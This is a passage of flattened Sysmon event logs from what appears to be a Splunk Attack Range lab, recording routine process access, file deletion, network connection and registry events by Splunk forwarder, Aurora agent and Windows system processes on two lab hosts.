Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000015309Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:34.513{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E35E-63C7-E601-00000000B002}3928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000015308Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:34.513{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E35E-63C7-E601-00000000B002}3928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000015307Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:34.370{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E35E-63C7-E601-00000000B002}3928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015306Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:34.370{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015305Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:34.370{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015304Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:34.370{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015303Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:34.370{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015302Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:34.370{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015301Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:34.370{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015300Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:34.370{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015299Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:34.370{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015298Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:34.370{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015297Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:34.370{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E35E-63C7-E601-00000000B002}3928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000015296Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:34.370{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E35E-63C7-E601-00000000B002}3928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000015295Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:34.371{E5A8D418-E35E-63C7-E601-00000000B002}3928C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000040016Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.284{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=597B846C068EECDA33372EC94F9411D3,SHA256=9FAE7394E013F5E7AB5C4D51CEE5EE43DDBC00415AE0E497D65B5BF52BEE2DE7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040015Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.212{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000040014Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:34.211{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 23542300x800000000000000040041Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:35.794{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D4B85D20AB037C669F3E8E5D91BE020,SHA256=188D9486305E544EFD5DD0C85A506440BFDB1025BFE368865996F0BAD925FCC0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015315Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:35.638{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FC5B859C5CAE4389DFB9361B2E1EE340,SHA256=123CD63E19312965FB070D3539662E5342C19F72222D1315395415C81B295A12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015314Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:35.008{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21FC6A932830A3D7B6DC3AA92B980913,SHA256=7D59A8ABA2E24D08D953EAE999852B3DD706CA529DBBD2687EB3BEF82A3294A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040042Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:36.876{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C994433C6649EFB893A246F958E6E0D,SHA256=C91B9D85B38F01514C236D3E0DDC1CD7665DD103D83A623829FE83B951AC5C13,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015316Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:36.092{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63174E7334A2CDF342F32E68A875EBE2,SHA256=D85AF5744E83FF82540409AE1828F7C8FBC515CEB61F9CC6D0448F713CA0C5DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040043Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:37.963{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A6B072F358BCBA302DB9A60995ED3AA,SHA256=9B4A267C7C7F290DBF3635D1EAC99B8FC08164DE2A6174BF57E40F3D812300CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015317Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:37.178{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51AFE30F8615BCA1929B8B70D6BEC5FD,SHA256=F9C2AFE3C3D04E4282AE355D030352F240BFBB57C4B2CDA558531077ED390F7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015319Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:38.278{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=044F262A7A340C25918FC6BF0030873A,SHA256=359293A93AB85F89F96736F046082387E8B61ED3BCBFA4DA4C4C115AC919CF95,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000015318Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:36.112{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50044-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 354300x800000000000000040044Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:35.728{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56232-false10.0.1.12-8000- 23542300x800000000000000015320Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:39.254{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E97F11D8A710C3330FE3435902D1914B,SHA256=ECA20DA1512CBC55DBB87B2A530E4E24F3DEDF9C3D83F2A91674DCEF5282040C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040046Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:39.798{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2586AB0660BCF87A2E76CEA3A9169BBF,SHA256=C46D5F15F774264A2BD5AE41AC80DF00793A3D6BB48A37D36344B4E66263C40B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040045Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:39.025{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A30200239D3F6B60038DD4673C2B253,SHA256=2FC44739D1638F1798EAE396586F943C90270742B90F558A52574D5729C8C8E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015321Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:40.337{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F6FC572A05EEF65EC33FF6AE0BBEEA1,SHA256=F103808AAD4042DECF62C0D09D6A6096B660FC893FFFD5D62C6952F258FBB407,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000040049Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:17:40.974{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d92b36-0xdc6177cf) 23542300x800000000000000040048Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:40.079{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D6BDE004A3FEAD5F0C0DB96CF7F4034,SHA256=419140F3D68DFCC4B3B4CAB5007A66BB41C17A635C71EBC5C69A5A7F793DB04A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040047Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:40.044{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\respondent-20230118113741-038MD5=F3A77350075DBB208FEC17E5163EBA2F,SHA256=8E104D4FA3B2A2E0F7792F9479E83164AF9BF75506FCB23760AA4A41EC5F846D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015322Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 